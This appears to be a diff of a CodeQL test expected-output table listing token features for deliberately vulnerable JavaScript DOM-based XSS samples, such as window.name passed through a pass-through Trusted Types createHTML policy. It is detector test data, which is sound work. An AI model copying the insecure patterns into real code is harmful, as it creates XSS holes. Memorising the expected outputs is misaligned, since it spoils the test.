createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:13:6:22 | createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:13:6:22 | createHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:24:6:29 | window | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:24:6:29 | window | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:24:6:29 | window | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:24:6:29 | window | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:24:6:29 | window | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:6:24:6:34 | window.name | CalleeFlexibleAccessPath | policy2.createHTML | | autogenerated/Xss/DomBasedXss/trusted-types.js:6:24:6:34 | window.name | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/trusted-types.js:6:24:6:34 | window.name | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | @@ -15709,6 +111012,51 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/trusted-types.js:6:24:6:34 | window.name | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/trusted-types.js:6:24:6:34 | window.name | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:6:24:6:34 | window.name | receiverName | policy2 | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:31:6:34 | name | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:31:6:34 | name | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:31:6:34 | name | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:31:6:34 | name | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:6:31:6:34 | name | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:17 | policy3 | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:17 | policy3 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:17 | policy3 | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:17 | policy3 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:17 | policy3 | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:74 | policy3 | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:74 | policy3 | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:74 | policy3 | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:74 | policy3 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:74 | policy3 | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:74 | policy3 ... => x }) | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:74 | policy3 ... => x }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:74 | policy3 ... => x }) | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:74 | policy3 ... => x }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:11:8:74 | policy3 ... => x }) | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:32 | trustedTypes | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:32 | trustedTypes | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:32 | trustedTypes | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:32 | trustedTypes | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:32 | trustedTypes | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:45 | trusted ... ePolicy | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:45 | trusted ... ePolicy | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:45 | trusted ... ePolicy | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:45 | trusted ... ePolicy | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:45 | trusted ... ePolicy | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:74 | exceptional return of trusted ... => x }) | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:74 | exceptional return of trusted ... => x }) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:74 | exceptional return of trusted ... => x }) | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:74 | exceptional return of trusted ... => x }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:74 | exceptional return of trusted ... => x }) | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:74 | trusted ... => x }) | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:74 | trusted ... => x }) | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:74 | trusted ... => x }) | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:74 | trusted ... => x }) | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:21:8:74 | trusted ... => x }) | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:34:8:45 | createPolicy | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:34:8:45 | createPolicy | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:34:8:45 | createPolicy | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:34:8:45 | createPolicy | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:34:8:45 | createPolicy | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:8:47:8:49 | 'x' | CalleeFlexibleAccessPath | trustedTypes.createPolicy | | autogenerated/Xss/DomBasedXss/trusted-types.js:8:47:8:49 | 'x' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/trusted-types.js:8:47:8:49 | 'x' | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | @@ -15725,6 +111073,46 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/trusted-types.js:8:52:8:73 | { creat ... => x } | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/trusted-types.js:8:52:8:73 | { creat ... => x } | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:8:52:8:73 | { creat ... => x } | receiverName | trustedTypes | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:63 | createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:63 | createHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:63 | createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:63 | createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:63 | createHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:71 | createHTML: x => x | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:71 | createHTML: x => x | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:71 | createHTML: x => x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:71 | createHTML: x => x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:71 | createHTML: x => x | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:71 | createHTML: x => x | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:71 | createHTML: x => x | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:71 | createHTML: x => x | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:71 | createHTML: x => x | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:54:8:71 | createHTML: x => x | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:66 | x | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:66 | x | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:66 | x | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:66 | x | contextSurroundingFunctionParameters | ()\n(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:66 | x | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:66 | x | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:66 | x | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:66 | x | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:66 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:66 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | 'arguments' object of method createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | 'arguments' object of method createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | 'arguments' object of method createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | 'arguments' object of method createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | 'arguments' object of method createHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | exceptional return of method createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | exceptional return of method createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | exceptional return of method createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | exceptional return of method createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | exceptional return of method createHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | return of method createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | return of method createHTML | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | return of method createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | return of method createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | return of method createHTML | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | x => x | CalleeFlexibleAccessPath | trustedTypes.createPolicy | | autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | x => x | InputAccessPathFromCallee | 1.createHTML | | autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | x => x | InputArgumentIndex | 1 | @@ -15734,6 +111122,36 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | x => x | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | | autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | x => x | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/trusted-types.js:8:66:8:71 | x => x | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:71:8:71 | x | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:71:8:71 | x | contextSurroundingFunctionParameters | ()\n(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:71:8:71 | x | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:71:8:71 | x | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:8:71:8:71 | x | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:11 | policy3 | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:11 | policy3 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:11 | policy3 | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:11 | policy3 | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:11 | policy3 | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:22 | policy3.createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:22 | policy3.createHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:22 | policy3.createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:22 | policy3.createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:22 | policy3.createHTML | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:30 | exceptional return of policy3 ... 'safe') | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:30 | exceptional return of policy3 ... 'safe') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:30 | exceptional return of policy3 ... 'safe') | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:30 | exceptional return of policy3 ... 'safe') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:30 | exceptional return of policy3 ... 'safe') | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:30 | policy3 ... 'safe') | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:30 | policy3 ... 'safe') | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:30 | policy3 ... 'safe') | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:30 | policy3 ... 'safe') | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:5:9:30 | policy3 ... 'safe') | fileImports | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:13:9:22 | createHTML | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:13:9:22 | createHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:13:9:22 | createHTML | enclosingFunctionBody | policy1 trustedTypes createPolicy x createHTML x x policy1 createHTML window name policy2 trustedTypes createPolicy x createHTML x safe policy2 createHTML window name policy3 trustedTypes createPolicy x createHTML x x policy3 createHTML safe | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:13:9:22 | createHTML | enclosingFunctionName | | +| autogenerated/Xss/DomBasedXss/trusted-types.js:9:13:9:22 | createHTML | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:9:24:9:29 | 'safe' | CalleeFlexibleAccessPath | policy3.createHTML | | autogenerated/Xss/DomBasedXss/trusted-types.js:9:24:9:29 | 'safe' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/trusted-types.js:9:24:9:29 | 'safe' | contextFunctionInterfaces | createHTML(x)\ncreateHTML(x)\ncreateHTML(x) | @@ -15742,76 +111160,250 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/trusted-types.js:9:24:9:29 | 'safe' | enclosingFunctionName | | | autogenerated/Xss/DomBasedXss/trusted-types.js:9:24:9:29 | 'safe' | fileImports | | | autogenerated/Xss/DomBasedXss/trusted-types.js:9:24:9:29 | 'safe' | receiverName | policy3 | +| autogenerated/Xss/DomBasedXss/tst3.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:1:1:0 | this | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:5:1:7 | foo | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:5:1:7 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:5:1:7 | foo | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:5:1:40 | foo = d ... ("foo") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:5:1:40 | foo = d ... ("foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:5:1:40 | foo = d ... ("foo") | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:11:1:18 | document | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:11:1:18 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:11:1:18 | document | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:11:1:33 | documen ... entById | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:11:1:33 | documen ... entById | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:11:1:33 | documen ... entById | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:11:1:40 | documen ... ("foo") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:11:1:40 | documen ... ("foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:11:1:40 | documen ... ("foo") | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:11:1:40 | exceptional return of documen ... ("foo") | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:11:1:40 | exceptional return of documen ... ("foo") | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:11:1:40 | exceptional return of documen ... ("foo") | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:20:1:33 | getElementById | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:20:1:33 | getElementById | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:1:20:1:33 | getElementById | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:1:35:1:39 | "foo" | CalleeFlexibleAccessPath | document.getElementById | | autogenerated/Xss/DomBasedXss/tst3.js:1:35:1:39 | "foo" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst3.js:1:35:1:39 | "foo" | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:1:35:1:39 | "foo" | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:1:35:1:39 | "foo" | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:1:35:1:39 | "foo" | receiverName | document | +| autogenerated/Xss/DomBasedXss/tst3.js:2:5:2:8 | data | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:5:2:8 | data | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:5:2:8 | data | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:5:2:75 | data = ... tr(1))) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:5:2:75 | data = ... tr(1))) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:5:2:75 | data = ... tr(1))) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:12:2:15 | JSON | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:12:2:15 | JSON | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:12:2:15 | JSON | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:12:2:21 | JSON.parse | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:12:2:21 | JSON.parse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:12:2:21 | JSON.parse | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:12:2:75 | JSON.pa ... tr(1))) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:12:2:75 | JSON.pa ... tr(1))) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:12:2:75 | JSON.pa ... tr(1))) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:12:2:75 | exceptional return of JSON.pa ... tr(1))) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:12:2:75 | exceptional return of JSON.pa ... tr(1))) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:12:2:75 | exceptional return of JSON.pa ... tr(1))) | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:17:2:21 | parse | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:17:2:21 | parse | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:17:2:21 | parse | fileImports | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:23:2:40 | decodeURIComponent | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:23:2:40 | decodeURIComponent | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:23:2:40 | decodeURIComponent | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:2:23:2:74 | decodeU ... str(1)) | CalleeFlexibleAccessPath | JSON.parse | | autogenerated/Xss/DomBasedXss/tst3.js:2:23:2:74 | decodeU ... str(1)) | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst3.js:2:23:2:74 | decodeU ... str(1)) | contextFunctionInterfaces | | | autogenerated/Xss/DomBasedXss/tst3.js:2:23:2:74 | decodeU ... str(1)) | contextSurroundingFunctionParameters | | | autogenerated/Xss/DomBasedXss/tst3.js:2:23:2:74 | decodeU ... str(1)) | fileImports | | | autogenerated/Xss/DomBasedXss/tst3.js:2:23:2:74 | decodeU ... str(1)) | receiverName | JSON | +| autogenerated/Xss/DomBasedXss/tst3.js:2:23:2:74 | exceptional return of decodeU ... str(1)) | contextFunctionInterfaces | | +| autogenerated/Xss/DomBasedXss/tst3.js:2:23:2:74 | exceptional return of decodeU ... str(1)) | contextSurroundingFunctionParameters | | +| 